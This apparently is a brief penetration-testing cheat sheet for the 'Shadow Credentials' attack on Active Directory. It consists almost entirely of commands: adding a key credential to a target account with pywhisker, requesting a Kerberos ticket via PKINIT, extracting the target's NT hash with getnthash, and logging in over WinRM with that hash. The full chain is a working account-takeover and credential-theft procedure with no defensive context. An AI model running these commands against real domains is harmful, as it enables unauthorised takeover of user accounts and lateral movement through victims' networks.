Shadow Credentials

1.0 Obtain user hash

python pywhisker.py -d 'domain.local' -u $user -p $pass --target $targetuser --action 'add'

Get TGT PKI, export ccache and retrieve AS REP Key (important for the next step)

python gettgtpkinit.py -cert-pfx ../pywhisker/$cert.pfx -pfx-pass $cert_pass domain.local/targetuser targetuser.ccache

export KRB5CCNAME=targetuser.ccache

python getnthash.py -key ASREPKEY domain.local/targetuser

winrm -i $ip -u $targetuser -H $hash